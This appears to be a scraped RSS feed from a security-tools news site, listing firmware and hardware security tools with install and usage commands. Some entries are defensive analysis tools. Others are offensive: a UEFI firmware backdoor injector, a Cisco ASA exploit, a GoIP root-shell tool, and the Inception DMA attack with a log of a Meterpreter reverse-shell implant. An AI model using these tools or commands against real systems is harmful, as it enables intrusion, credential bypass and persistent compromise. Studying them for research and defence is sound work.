Warning: fopen(/home/seclistu/public_html/wp-content/iosec_admin/banlisttemp): failed to open stream: Permission denied in /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php on line 273

Warning: fopen(/home/seclistu/public_html/wp-content/iosec_admin/banlist): failed to open stream: Permission denied in /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php on line 277

Warning: fopen(/home/seclistu/public_html/wp-content/iosec_admin/ips): failed to open stream: Permission denied in /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php on line 281

Warning: Cannot modify header information - headers already sent by (output started at /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php:273) in /home/seclistu/public_html/wp-includes/feed-rss2.php on line 8
firmware – Security List Network™ http://seclist.us Wed, 25 Apr 2018 22:10:46 +0000 en-US hourly 1 TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerability. http://seclist.us/trommel-sift-through-directories-of-files-to-identify-indicators-that-may-contain-vulnerability.html Fri, 20 Oct 2017 01:09:09 +0000 http://seclist.us/?p=15754 TROMMEL – sifts through directories of files to identify indicators that may contain vulnerabilities.

TROMMEL identifies the following indicators related to:
– Secure Shell (SSH) key files
Secure Socket Layer (SSL) key files
– Internet Protocol (IP) addresses
– Uniform Resource Locator (URL)
– email addresses
– shell scripts
– web server binaries
– configuration files
– database files
– specific binaries files (i.e. Dropbear, BusyBox, etc.)
– shared object library files
– web application scripting variables, and
Android application package (APK) file permissions.
TROMMEL has also integrated vFeed which allows for further in-depth vulnerability analysis of identified indicator.

trommel

Dependencies:
+ Python-Magic https://pypi.python.org/pypi/python-magic
+ vFeed Database Community(free Edition) https://vfeed.io/pricing/
The vFeed.db (The Correlated Vulnerability and Threat Database) is a detective and preventive security information repository used for gathering vulnerability and mitigation data from scattered internet sources into an unified database

Notes
* TROMMEL has been tested using Python 2.7 on macOS Sierra and Kali Linux x86_64.
* TROMMEL was written with the intent to help with identifying indicators that may contain vulnerabilities found in firmware of embedded devices

Usage:

git clone https://github.com/CERTCC-Vulnerability-Analysis/trommel && cd trommel
./trommel.py --help
./trommel.py -p /directory -o output_file

Source: https://github.com/CERTCC-Vulnerability-Analysis

]]>
uefi firmware parser – Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc. http://seclist.us/uefi-firmware-parser-parse-biosintel-meuefi-firmware-related-structures-volumes-filesystems-files-etc.html Thu, 28 Sep 2017 15:15:18 +0000 http://seclist.us/?p=15589 The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials.

Features:
+ UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
+ Intel PCH Flash Descriptors
+ Intel ME modules parsing (ME, TXE, etc)
+ Dell PFS (HDR) updates parsing
+ Tiano/EFI, and native LZMA (7z) [de]compression
+ Complete UEFI Firmware volume object hierarchy display
+ Firmware descriptor [re]generation using the parsed input volumes
+ Firmware File Section injection

The UEFI firmware parser v1.7

Supported Vendors
This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse, some may required a-priori decompression or extraction from the distribution update mechanism (typically a PE).
– ASRock
– Dell
– Gigabyte
– Intel
– Lenovo
– HP
– MSI
– VMware
– Apple

Requirements
– Python development headers, usually found in the python-dev package.
– The compression/decompression features will use the python headers and gcc.
– pefile is optional, and may be used for additional parsing.

Usage:

git clone https://github.com/theopolis/uefi-firmware-parser && cd uefi-firmware-parser
pip install -r requirements.txt
./bin/uefi-firmware-parser -h
./bin/uefi-firmware-parser --test <your_image_firmware>
python scripts/fv_injector.py -h

python /scripts/uefi_guids.py -h

Install with pypi:
sudo pip install uefi_firmware
sudo pip install uefi_firmware --upgrade (for upgrade)

Source: https://github.com/theopolis

]]>
DblTekGoIPPwn – Tool to exploits challenge response system in vulnerable DblTek GoIP devices. http://seclist.us/dbltekgoippwn-tool-to-exploits-challenge-response-system-in-vulnerable-dbltek-goip-devices.html Mon, 06 Mar 2017 07:59:54 +0000 http://seclist.us/?p=13672 DblTekGoIPPwn is Tool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to specified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, and drop into a root shell on any vulnerable host.

The Vulnerability
+ On March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek GoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named ‘dbladm’. When a user entered this as their username in a telnet prompt, the system would present a challenge that when followed with the right response, gave the user a root shell on the system.
+ The problem with such a challenge response system is that the devices are as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be aquired on ANY DblTek GoIP device.

DblTekGoIPPwn

Linux Dependencies:
+ Mono
Windows Dependencies:
+ Visual Studio

Usage:

git clone https://github.com/JacobMisirian/DblTekGoIPPwn && cd DblTekGoIPPwn
./install.sh
DblTekGoIPPwn --help
DblTekGoIPPwn --send-commands cmds.txt --file list.txt --output results.txt

Source: https://github.com/JacobMisirian

]]>
mithören is An extensible platform for wireless peripheral keystroke sniffing for microcomputers. http://seclist.us/mithoren-is-an-extensible-platform-for-wireless-peripheral-keystroke-sniffing-for-microcomputers.html Sun, 20 Nov 2016 22:42:07 +0000 http://seclist.us/?p=12567 mithören is An extensible platform for wireless peripheral keystroke sniffing for microcomputers.
The purpose of this project is to provide for simple, extensible, human-readable interfacing with wireless peripheral sniffing. By combing a suite of existing tools into a simple set of commands, this platform makes penetration testing and device reconnaisance compact.

Mithoren FrontEnd

Mithoren FrontEnd

Firmware and research tools for Nordic Semiconductor nRF24LU1+ based USB dongles and breakout boards.
Requirements
+ SDCC (minimum version 3.1.0)
+ GNU Binutils
+ Python
+ PyUSB
+ platformio

Supported Hardware
The following hardware has been tested and is known to work.
– CrazyRadio PA USB dongle
– SparkFun nRF24LU1+ breakout board
– Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)

Features:
+ Flash over USB
+ Flash a Logitech Unifying dongle
+ Flash a Logitech Unifying dongle back to the original firmware.
+ Flash over SPI using a Teensy
+ Flash the nRF24LU1+

Mithoren Tools

Mithoren Tools

=Installation=
To utilize the full-system image:
* Flash image file under ‘image’ onto an SD-card or

For the standalone application:
* Copy ‘app’ into working directory
* Run ‘mithren.py’

Download and build from source base Debian/Ubuntu:

Install Dependencies:
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio

git clone https://github.com/wolfmd/mith-ren && cd mith-ren
cd modules/mousejack/
make
To flash the firmware over USB:
sudo make install

To flash the firmware over USB onto a Logitech Unifying dongle:
sudo make logitech_install

To flash the Logitech firmware onto the dongle:
sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex]

Build and Upload the Teensy Flasher
platformio run --project-dir teensy-flasher --target upload

Flash the nRF24LU1+
sudo make spi_install

For Tools Reconnaisance:
cd tools  and run one by one

Finaly:
cd ..
cd app
run 
python mithren-frontend.py
python mithrend.py

Source: https://github.com/wolfmd

]]>
Toolkit to emulate firmware and analyse it for security vulnerabilities. http://seclist.us/toolkit-to-emulate-firmware-and-analyse-it-for-security-vulnerabilities.html Sat, 19 Nov 2016 06:44:05 +0000 http://seclist.us/?p=12552 FAT is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware. This is built in order to use for the “Offensive IoT Exploitation” training conducted by Attify.

Note:
* As of now, it is simply a script to automate Firmadyne which is a tool used for firmware emulation. In case of any issues with the actual emulation, please post your issues in the firmadyne issues.
* In case you are on Kali and are facing issues with emulation, it is recommended to use the AttifyOS Pre-Release VM downloadable from here, or alternatively you could do the above mentioned.

Firmware Analysis Toolkit

Firmware Analysis Toolkit

Firmware Analysis Toolkit is build on top of the following existing tools and projects :
1. Firmadyne
2. Binwalk
3. Firmware-Mod-Kit
4. MITMproxy
5. Firmwalker

Download and Setup instructions:

Install Binwalk:

git clone https://github.com/devttys0/binwalk.git
cd binwalk
sudo ./deps.sh
sudo python ./setup.py install
sudo apt-get install python-lzma :: (for Python 2.x)
sudo -H pip install git+https://github.com/ahupp/python-magic

Setting up firmadyne:

sudo apt-get install busybox-static fakeroot git kpartx netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp uml-utilities util-linux vlan qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
git clone --recursive https://github.com/firmadyne/firmadyne.git
cd ./firmadyne; ./download.sh

Edit firmadyne.config and make the FIRMWARE_DIR point to the current location of Firmadyne folder.

Setting up FAT:

git clone https://github.com/attify/firmware-analysis-toolkit
mv firmware-analysis-toolkit/fat.py .
mv firmware-analysis-toolkit/reset.sh .
chmod +x fat.py
chmod +x reset.sh
vi fat.py
Here, edit the line number 9 which is firmadyne_path = '/root/tools/firmadyne' to the correct path in your system.

Setting up Firmware-mod-Kit:

sudo apt-get install git build-essential zlib1g-dev liblzma-dev python-magic
git clone https://github.com/brianpow/firmware-mod-kit.git
Find the location of binwalk using which binwalk . Modify the file shared-ng.inc to change the value of variable BINWALK to the value of /usr/local/bin/binwalk (if that is where your binwalk is installed). .

Setting up MITMProxy:
pip install mitmproxy or apt-get install mitmproxy

Setting up Firmwalker:
git clone https://github.com/craigz28/firmwalker.git

python fat.py

Source: https://github.com/attify

]]>
CHIPSEC v1.2.5 – Platform Security Assessment Framework. http://seclist.us/chipsec-v1-2-5-platform-security-assessment-framework.html Sat, 05 Nov 2016 10:35:54 +0000 http://seclist.us/?p=12342 CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware
(BIOS/UEFI), and the configuration of platform components. It includes a security test suite, security assessment
tools for various low level components/interfaces, and basic forensic capabilities for firmware.
CHIPSEC can run from Windows, Linux, Mac OS X and UEFI Shell.

What is Platform Security?
Hardware Implementation and Configuration
• Available Security Features
• Correct Configuration of HW Components
• Testing/Demonstration of HW Security Mechanisms
Firmware Implementation and Configuration
• Access Controls on Firmware Interfaces
• Correct Settings of Lock Bits
• Testing/Demonstration of FW Security Mechanisms

chipsec v1.2.5

chipsec v1.2.5

feature:
+ System Management Mode
* CPU SMM Cache Poisoning / SMM Range Registers (SMRR)
* SMM memory (SMRAM) Lock
+ BIOS Write Protection
+ Direct HW Access for Manual Testing
+ Forensics
* Live system firmware analysis
* Offline system firmware analysis

Latest Change chipsec v1.2.5:
* More generic handling of chipsec_tools
* file extension fix
* Installing chipsec-manual.pdf
* change setup.py build driver by default. change root directory of chipsec. move WARNING.txt to chipsec. remove PKG-INFO

Tested on:
• Fedora LXDE 64bit
• Ubuntu 64bit
• Debian 64bit and 32bit
• Linux UEFI Validation (LUV)

Installing Manually on Linux & Mac OSX Platform:

Clone chipsec Git repository and install it as a package:
git clone https://github.com/chipsec/chipsec
python setup.py install
sudo chipsec_main
To use CHIPSEC in place without installing it:
python setup.py build_ext -i
sudo python chipsec_main.py

Clone chipsec Git repository and install it as a package:
# git clone https://github.com/chipsec/chipsec
# python setup.py install
# sudo chipsec_main
To use CHIPSEC in place without installing it:
# python setup.py build_ext -i
# sudo python chipsec_main.py

NOTE: Please read chipsec-manual.pdf For Detail installation and Configuration.

Source :https://github.com/chipsec

]]>
Cisco ASA SNMP Remote Code Execution Vulnerability(CVE-2016-6366). http://seclist.us/cisco-asa-snmp-remote-code-execution-vulnerabilitycve-2016-6366.html Sat, 24 Sep 2016 02:13:22 +0000 http://seclist.us/?p=12018 This is Public repository for improvements to the EXTRABACON v2 exploit, a remote code execution for Cisco ASA written by the Equation Group (NSA) and leaked by the Shadow Brokers.
on this repository has been adding patches for most versions of 8.x and 9.x in the near future after we test all versions on real hardware. There is improved shellcode, a LINA offset finder script, a Metasploit module, and extrabacon-2.0. This is using improved shellcode, has less stages than the Equation Group version making it more reliable. This makes the SNMP payload packet ~150 less bytes. Also, the leaked version only supports 8.x, we have it working on 9.x versions.

extrabacon v2

extrabacon v2

* Lina offset finder
– python2 ./lina-offsets.py asa_lina_XXX.elf

Will automatically generate necessary offsets to port the exploit to other versions of ASA.
Right now, it takes us longer to load a version of ASA firmware and test it, than it does to generate offsets for a specific version.

The only thing the script doesn’t calculate is FIX_EBP, which is usually 0x48 (72) or 0x58 (88). It seems like 8.4(1) and greater use 0x48.

Dependencies:
+ Metasploit Framework
+ Python 2.7.x
+ Python Scapy Modules
+ NASM

Use and Download:

sudo apt-get install nasm
(makesure you have metasploit framework on your system)
git clone https://github.com/RiskSense-Ops/CVE-2016-6366 && cd CVE-2016-6366
nasm shellcode.nasm (for execute shellcode)
then now you can compile

python2 lina-offsets.py Your_asa_lina_XXX.elf

Source: https://github.com/RiskSense-Ops

]]>
HEATHEN – Internet Of Things Pentesting Framework. http://seclist.us/heathen-internet-of-things-pentesting-framework.html Thu, 15 Sep 2016 00:50:46 +0000 http://seclist.us/?p=11959 Heathen IoT of Things Penetration Testing Framework developed as a research project, which automatically help developers and manufacturers build more secure products in the Internet of Things space based on the Open Web Application Security Project (OWASP) by providing a set of features in every fundamantal era.

heathen

HEATHEN – Internet Of Things Pentesting Framework.

Main Menu:
* Insecure Web Interface
* Insufficient Authentication/Authorization
[-] Ensure that any access requiring authentication requires strong passwords
[-] Ensure that user roles can be properly segregated in multi-user environments
[-] Implement two-factor authentication where possible
[-] Ensure password recovery mechanisms are secure
[-] Ensure that users have the option to require strong passwords
[-] Ensure that users have the option to force password expiration after a specific period
[-] Ensure that users have the option to change the default username and password
* Insecure Network Services
* Lack of Transport Encryption
* Privacy Concerns
* Insecure Cloud Interface
* Insecure Mobile Interface
* Insufficient Security Configurability
* Insecure Software/Firmware
* Poor Physical Security
[-] Ensure the device is produced with a minimal number of physical external ports (e.g. USB ports)
[-] Ensure the firmware of Operating System can not be accessed via unintended methods such as through an unnecessary USB port
[-] Ensure the product is tamper resistant
[-] Ensure the product has the ability to limit administrative capabilities in some fashion, possibly by only connecting locally for admin functions
[-] Ensure the product has the ability to disable external ports such as USB

Usage and download:

git clone https://github.com/chihebchebbi/Internet-Of-Things-Pentesting-Framework.git heathen && cd heathen
bash Heathen.sh

Source: https://github.com/chihebchebbi

]]>
PEI stage backdoor for UEFI compatible firmware. http://seclist.us/pei-stage-backdoor-for-uefi-compatible-firmware.html Sun, 28 Aug 2016 10:41:40 +0000 http://seclist.us/?p=11813 This project implements early stage firmware backdoor for UEFI based firmware. It allows to execute arbitrary code written in C during Pre EFI Init (PEI) phase of Platform Initialization (PI). This backdoor might be useful for low level manipulations with the target platform configuration when the most of the platform configuration registers are not locked yet.

PEI backdoor project includes:
+ PeiBackdoor.py – Python program that allows to infect raw flash images or individual UEFI PEI drivers with the backdoor code.
+ PeiBackdoor_IA32.efi, PeiBackdoor_IA32.pdb – 32-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = IA32.
+ PeiBackdoor_X64.efi, PeiBackdoor_X64.pdb – 64-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = X64.
+ PeiBackdoor.inf – PEI backdoor project configuration for EDK2 build environment.
+ config.h – PEI backdoor build options.
+ payload.c – Put your own PEI stage code into this source file and call it from Payload() function.
+ src/ – Rest of the PEI backdoor code.
PeiBackdoor.py is using Capstone engine and pefile Python libraries, you need to install them with pip install capstone pefile command.

PeiBackdoor

PeiBackdoor .py program to deploy PEI backdoor

Possible applied use cases:
* Edit values of REMAPBASE, REMAPLIMIT and other host controller registers during RAM initialization to perform UMA remap attack on Intel Management Engine RAM.
* Lock TSEGMB host controller register with the junk value to make System Management Mode code vulnerable to DMA attacks.
* Do other evil things that requires hijacking of early stage platform initialization code.

To build PeiBackdoor project you need to have a Windows machine with Visual Studio 2008 and EDK2 https://github.com/tianocore/edk2 source code.
Step by step instruction:
1. Run Visual Studio 2008 Command Prompt and cd to EDK2 directory.
2. Execute Edk2Setup.bat –pull command to configure build environment and download required binaries.
3. Execute git clone git://github.com/Cr4sh/PeiBackdoor.git command.
4. Edit Conf/target.txt file and set ACTIVE_PLATFORM property value to the OvmfPkg/OvmfPkgX64.dsc for 64-bit build or to the OvmfPkg/OvmfPkgIa32.dsc for 32-bit build. Also you need to set TARGET_ARCH property value to the X64 for 64-bit build or to the IA32 for 32-bit build.
5. Edit OvmfPkg/OvmfPkgX64.dsc and add PeiBackdoor/PeiBackdoor.inf path at the end of the [components] section.
6. cd PeiBackdoor && build
7. After compilation resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 64-bit build or at Build/OvmfX64/DEBUG_VS2008x86/IA32/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 32-bit build.

Running on real hardware
To run PeiBackdoor.efi on your physical machine you need to obtain image of existing PEI driver:
1. Dump motherboard firmware using hardware SPI programmer.
2. Open dumped flash image in UEFITool and extract PE/TE image of existing PEI driver that you want to infect with PEI backdoor:

pei-replace

pei-replace

..and itfect it using PeiBackdoor.py:
1. Infect extracted PE or TE image with SmmBackdoor_IA32.efi or SmmBackdoor_X64.efi depending on it’s architecture: python PeiBackdoor.py -d image.efi -o image_patched.efi -p PeiBackdoor_X64.efi
2.Use UEFITool to replace original PE image with image_patched.efi, save modified flash image into the file and write it to the motherboard ROM with programmer.
Usage and Download from git:

git clone https://github.com/Cr4sh/PeiBackdoor && cd PeiBackdoor
python PeiBackdoor.py -f flash.bin -p PeiBackdoor_IA32.efi -o flash_patched.bin

Source: http://blog.cr4.sh/ | https://github.com/Cr4sh

]]>
Inception v0.4.1 is a physical memory manipulation and hacking tool exploiting PCI-based DMA. http://seclist.us/inception-v0-4-1-is-a-physical-memory-manipulation-and-hacking-tool-exploiting-pci-based-dma.html Wed, 29 Jun 2016 21:40:23 +0000 http://seclist.us/?p=11266 NOTICE : FOR SECURITY PROFFESIONAL, RESEARCHERS AND PENETRATION TEST RESEARCH

Roadmap & Changelog v0.4.1-git 29/6/2016:
+ Added some offsets for WIN7 Enterprise x64
Changelog 04/17/2015 v-0.4.1 Stable:
– Merged SLOTSCREAMER interface support

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.inception

How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.

Caveats
OS X > 10.7.2 and Windows > 8.1 disables FireWire DMA when the user has locked the OS and thus prevents inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.

Requirements

Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
libforensic1394
— msgpack

*) Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for  versions before 10.7.2, where the vulnerability is patched.
  • If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Installation
On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

or

wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz
cd libforensic1394-0.2
cmake CMakeLists.txt
make install
cd python
python3 setup.py install

 Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip  installed.

General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:

incept [module name]

For a more complete and up-to-date description,  run:

incept -h

Execution :

skygear$ incept implant --msfpw password --msfopts LHOST=36.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.1 (C) Carsten Maartmann-Moe 2016
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!<strong style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;" data-mce-style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;">&nbsp;</strong>

For Source & More Detail read here : http://www.breaknenter.org/projects/inception/

Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.

Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)

Master.zip | Clone Url | Our Post Before

]]>
Updates iv-wrt – An Intentionally Vulnerable Router Firmware Distribution. http://seclist.us/updates-iv-wrt-an-intentionally-vulnerable-router-firmware-distribution.html Mon, 10 Aug 2015 07:23:12 +0000 http://seclist.us/?p=7855 Latest Changelog : 9/8/2015:
– modified: exploits/auth_bypass.py
– modified: exploits/cmd_injection.py
– modified: exploits/csrf.py
– modified: iv-wrt.elf

iv-wrt is An intentionally vulnerable router firmware distribution based on OpenWrt.
Feature :
+ Authentication Bypass; Authentication bypass is turned off for the network disgnostics page.
+ Backdoor; A backdoor user account with root priveleges has been added.
+ Command Injection; It is possible to inject ash commands into the ping field which exists on <ip-address>/admin/network/diagnostics.
+ Reflected Cross-Site Scripting; On /cgi-bin/luci/;stok=<session-token>/admin/system/packages you can search for a package to determine whether or not it’s installed. Your search string is shown above the results. It is possible to inject scripting into this field.
+ Stored Cross-Site Scripting; It is possible to inject scripting into the hostname of the router. Since the hostname appears in the title of every page in the administration interface, this results in stored XSS for all pages.
+ Cross Site Request Forgery; While a user is logged in to the administration interface, a specially-crafted link from an outside source can cause actions to be executed on the administration interface. The system does not verify that the session token is correct.

Setup :
To start the image you will need qemu-system-mipsel and all of its dependencies. We recommend that you create a TAP device called tap0 and bridge it to your network interface. When the image boots, its LAN ip will be 10.0.0.1.

The driver for e1000 network cards have been built into the image. The following command will tell qemu to start the image using the interface tap0 and the e1000:

qemu-system-mipsel -kernel iv-wrt.elf -nographic -m 256 -net tap,ifname=tap0,script=no,downscript=no -net nic,model=e1000

Download : iv-wrt-master.zip(7.43 MB) | Our Post Before
Source : https://github.com/iv-wrt

]]>
Updates Inception v-0.4.1 is a physical memory manipulation and hacking tool exploiting PCI-based DMA. http://seclist.us/updates-inception-v-0-4-1-is-a-physical-memory-manipulation-and-hacking-tool-exploiting-pci-based-dma.html Fri, 17 Apr 2015 21:27:05 +0000 http://seclist.us/?p=7183 NOTICE : FOR SECURITY PROFFESIONAL, RESEARCHERS AND PENETRATION TEST RESEARCH

Changelog 04/17/2015 v-0.4.1:
– Merged SLOTSCREAMER interface support

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.

Caveats
OS X > 10.7.2 and Windows > 8.1 disables FireWire DMA when the user has locked the OS and thus prevents inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.

Requirements

Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
libforensic1394
— msgpack

*) Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for  versions before 10.7.2, where the vulnerability is patched.
  • If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Installation
On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

 Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip  installed.

General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:

incept [module name]

For a more complete and up-to-date description,  run:

incept -h

Execution :

0x0mar$ incept implant --msfpw password --msfopts LHOST=36.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
